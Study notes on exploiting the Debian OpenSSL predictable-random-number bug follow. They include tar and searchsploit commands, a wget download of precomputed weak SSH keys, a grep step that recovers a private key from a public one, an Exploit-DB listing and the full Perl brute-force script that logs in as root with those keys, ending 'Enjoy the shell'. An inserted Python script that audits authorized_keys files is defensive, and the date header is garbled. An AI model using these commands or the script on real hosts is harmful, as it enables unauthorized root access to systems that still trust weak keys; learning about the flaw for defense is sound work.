503 日 , 2024 15:30:00
PRNG & tar -j

tar

tar -vxjf 5622.tar.bz2

  • -v, --verbose: list each file as tar processes it;
  • -c, --create: create a new archive (mutually exclusive with -x, so a single command uses one or the other);
  • -x, --extract, --get: extract files from an archive;
  • -j, --bzip2: filter the archive through bzip2;
  • -f, --file: the archive file to operate on.

PRNG (Pseudo-Random Number Generator): a pseudo-random number generator, used in computer science and cryptography to produce sequences of numbers that approximate randomness.

OpenSSL 0.9.8c-1 < 0.9.8g-9

Debian systems with OpenSSL from version 0.9.8c-1 up to (but not including) 0.9.8g-9 have a vulnerability: the random number generator produces predictable output, which makes it much easier for a remote attacker to brute-force the cryptographic keys.

searchsploit prng

searchsploit -m linux/remote/5622.txt

wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/5622.tar.bz2

tar -vxjf 5622.tar.bz2

sudo grep -lr "<paste part of the public key's contents here>"

Once the matching public key file is found, strip its suffix: that is the file name of the private key. Copy that private key out and you have the private key corresponding to the public key.
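The same lookup, as an added example that is not part of the original notes, written from the audit side: given the text of an authorized_keys file and a directory of extracted .pub files, report every authorized key that appears in the weak set and the path of its private key (assumed, as above, to be the .pub path with the suffix stripped). The key strings below are constructed placeholders, not real keys.

```python
import os
import tempfile

# Constructed sample data: NOT real keys, only strings shaped like OpenSSH
# public-key lines so the matching logic can be exercised offline.
WEAK_SET = {
    "1111.pub": "ssh-rsa AAAAB3NzaC1yc2EAAAAweakkey1111== root@debian",
    "2222.pub": "ssh-rsa AAAAB3NzaC1yc2EAAAAweakkey2222== root@debian",
}
AUTHORIZED_KEYS = """\
# constructed authorized_keys: one key from the weak set, one not
ssh-rsa AAAAB3NzaC1yc2EAAAAweakkey2222== alice@laptop
ssh-rsa AAAAB3NzaC1yc2EAAAAstrongkey9999== bob@desk
"""

def parse_pubkey(line):
    """Return (keytype, base64 body) from an OpenSSH public-key line, or None.
    Leading options such as command="..." are skipped by looking for the
    first field that names a key type."""
    fields = line.strip().split()
    for i, f in enumerate(fields):
        if f.startswith(("ssh-", "ecdsa-")) and i + 1 < len(fields):
            return f, fields[i + 1]
    return None

def load_weak_keys(keydir):
    """Index every *.pub under keydir as (type, body) -> private key path.
    Assumption: the private key sits beside its .pub with the suffix removed."""
    index = {}
    for root, _, files in os.walk(keydir):
        for name in files:
            if name.endswith(".pub"):
                path = os.path.join(root, name)
                with open(path) as fh:
                    parsed = parse_pubkey(fh.read())
                if parsed:
                    index[parsed] = path[:-len(".pub")]
    return index

def audit_authorized_keys(authorized_keys_text, keydir):
    """Return [(key comment, private key path)] for each authorized key in the weak set."""
    index, hits = load_weak_keys(keydir), []
    for line in authorized_keys_text.splitlines():
        parsed = parse_pubkey(line) if line.strip() and not line.lstrip().startswith("#") else None
        if parsed and parsed in index:
            hits.append((line.split()[-1], index[parsed]))
    return hits

def demo():
    """Write the constructed weak set to a temp dir and audit the sample file."""
    with tempfile.TemporaryDirectory() as d:
        for name, content in WEAK_SET.items():
            with open(os.path.join(d, name), "w") as fh:
                fh.write(content + "\n")
        return [(c, os.path.basename(p)) for c, p in audit_authorized_keys(AUTHORIZED_KEYS, d)]
```

A non-empty result from audit_authorized_keys means that host still trusts a key from the predictable set and the key must be replaced.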

 ------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------- ---------------------------------
GNU Classpath 0.97.2 - 'gnu.java.security.util.PRNG' Class Entropy (1) | multiple/remote/32673.java
GNU Classpath 0.97.2 - 'gnu.java.security.util.PRNG' Class Entropy (2) | multiple/remote/32674.cpp
LPRng (RedHat 7.0) - 'lpd' Format String | linux/remote/227.c
LPRng - use_syslog Remote Format String (Metasploit) | linux/remote/16842.rb
LPRng 3.6.22/23/24 - Remote Command Execution | linux/remote/226.c
LPRng 3.6.24-1 - Remote Command Execution | linux/remote/230.c
LPRng 3.6.x - Failure To Drop Supplementary Groups | unix/local/20923.c
LPRNG html2ps 1.0 - Remote Command Execution | unix/remote/21974.pl
OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH | linux/remote/5622.txt
OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH | linux/remote/5720.py
OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH (Ruby) | linux/remote/5632.rb
------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

The Debian OpenSSL issue leads to there being only 65,536 possible SSH
keys generated, because the only entropy is the PID of the process
generating the key.
This means that the following Perl script can be used with the
precalculated SSH keys to brute force the SSH login. It works if such a
key is installed on a non-patched Debian or any other system manually
configured to.
On an unpatched system, which doesn't need to be Debian, do the following:
keys provided by HD Moore - http://metasploit.com/users/hdm/tools/debian-openssl/
***E-DB Note: Mirror ~ https://github.com/g0tmi1k/debian-ssh***
1. Download http://sugar.metasploit.com/debian_ssh_rsa_2048_x86.tar.bz2
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/5622.tar.bz2
 (debian_ssh_rsa_2048_x86.tar.bz2)
2. Extract it to a directory
3. Enter into the /root/.ssh/authorized_keys an SSH RSA key with 2048
bits, generated on an unpatched Debian (this is the key this exploit will
break)
4. Run the Perl script and give it the location to where you extracted
the bzip2 mentioned.

#!/usr/bin/perl
# Tries the precomputed keys in the given directory against the host,
# passing $keysPerConnect keys to each ssh invocation.
my $keysPerConnect = 6;
my @a;
unless ($ARGV[1]) {
    print "Syntax : ./exploiter.pl pathToSSHPrivateKeys SSHhostToTry\n";
    print "Example: ./exploiter.pl /root/keys/ 127.0.0.1\n";
    print "By mm\@deadbeef.de\n";   # escaped, or Perl interpolates @deadbeef as an empty array
    exit 0;
}
chdir($ARGV[0]) || die("chdir");
opendir(A, $ARGV[0]) || die("opendir");
while ($_ = readdir(A)) {
    chomp;
    next unless m,^\d+$,;   # private key files are named by the generating PID
    push(@a, $_);
    if (scalar(@a) > $keysPerConnect) {
        system("echo ".join(" ", @a)."; ssh -l root ".join(" ", map { "-i ".$_ } @a)." ".$ARGV[1]);
        @a = ();
    }
}
# Try whatever is left over after the last full batch.
if (@a) {
    system("echo ".join(" ", @a)."; ssh -l root ".join(" ", map { "-i ".$_ } @a)." ".$ARGV[1]);
}
5. Enjoy the shell after some minutes (less than 20 minutes)
Regards,
Markus Mueller
mm@deadbeef.de
